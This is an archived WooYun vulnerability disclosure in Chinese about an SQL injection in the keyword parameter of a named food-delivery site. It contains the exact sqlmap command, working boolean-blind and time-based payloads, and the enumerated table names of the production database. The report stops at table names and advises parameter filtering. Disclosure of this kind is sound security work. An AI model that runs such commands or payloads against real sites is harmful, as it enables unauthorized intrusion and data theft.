乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-03-09: 细节已通知厂商并且等待厂商处理中 2014-03-19: 厂商已经主动忽略漏洞,细节向公众公开
点我吧 主站SQL注射 可致数据库信息泄露 SQLMAP验证(仅演示取得数据表名称,不再继续深入) 望尽快到乌云认领漏洞并修复
漏洞位置:www.dianwoba.com/comment!getAllMicroblog.do?keyword=0&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091参数keyword无过滤,直接SQLMAP可注射
C:\Users\Administrator>sqlmap.py -u "www.dianwoba.com/comment!getAllMicroblog.do?keyword=0&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091" -p keyword --tables
sqlmap identified the following injection points with a total of 71 HTTP(s) requests:---Place: GETParameter: keyword Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keyword=0%' AND 7994=7994 AND '%'='&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: keyword=0%' AND SLEEP(5) AND '%'='&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091---web application technology: Nginx, JSPback-end DBMS: MySQL 5.0.11Database: website[104 tables]+---------------------------------------+| C3P0TestTable || a_lim_table1 || a_lim_table1_14_26 || a_table_cyk_all || a_table_sup || crm_address || crm_admin_operate_log || crm_after_sale || crm_b2bsups || crm_blacklist || crm_customer_service || crm_customer_service_status || crm_gps_gprs_message || crm_gps_gprs_order || crm_gps_gprs_order_bak || crm_mobile_city || crm_operation_log || crm_operation_log_bak || crm_operators || crm_order_his || crm_order_his_all || crm_peisong || crm_peisong_bak || crm_peisong_paiban || crm_peisongtuan || crm_peisongtuan_bak || crm_phone || crm_system_parameters || crm_viplist || crm_youhui_phone || g_building || g_item || g_item_type || g_market || g_queue_time || gps_whereru || w_coupon || w_coupon_user || wm_address || wm_address_express || wm_app_message || wm_app_message_copy || wm_app_message_copy1 || wm_app_phoneid || wm_app_tuisong || wm_bbs_rating_integral || wm_bbs_rating_level || wm_bbs_rating_type || wm_gorder || wm_gprs_printers || wm_gprsprint_order || wm_gprsprint_phoneno || wm_group || wm_group_department || wm_group_member || wm_group_operation_log || wm_images_sup || wm_integral || wm_ipforward || wm_joincity || wm_kuaike_member || wm_liansuo || wm_market_cj || wm_market_liansuo || wm_market_mail || wm_market_product || wm_market_product_prop || wm_market_property || wm_market_provider || wm_market_type || wm_market_type2 || wm_member || wm_member_consume || wm_member_day || wm_menu || wm_menu_class || wm_microblog_main || wm_microblog_reply || wm_money_application || wm_money_jftomoney || wm_money_record || wm_moneyuse_log || wm_notice || wm_order || wm_order_detail || wm_order_his || wm_order_id || wm_order_wcps20140209 || wm_pack_dic || wm_package_menu || wm_package_rule || wm_package_submenu || wm_pay_log || wm_prize || wm_prize_record || wm_shop_class || wm_sixin || wm_sixin_read || wm_sup_info || wm_supclass || wm_supplier || wm_supplier_favorite || wm_wuliu || wm_youhui |+---------------------------------------+Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+
望尽快到乌云认领漏洞并修复
加强参数过滤望尽快到乌云认领漏洞并修复
危害等级:无影响厂商忽略
忽略时间:2014-03-19 12:26
暂无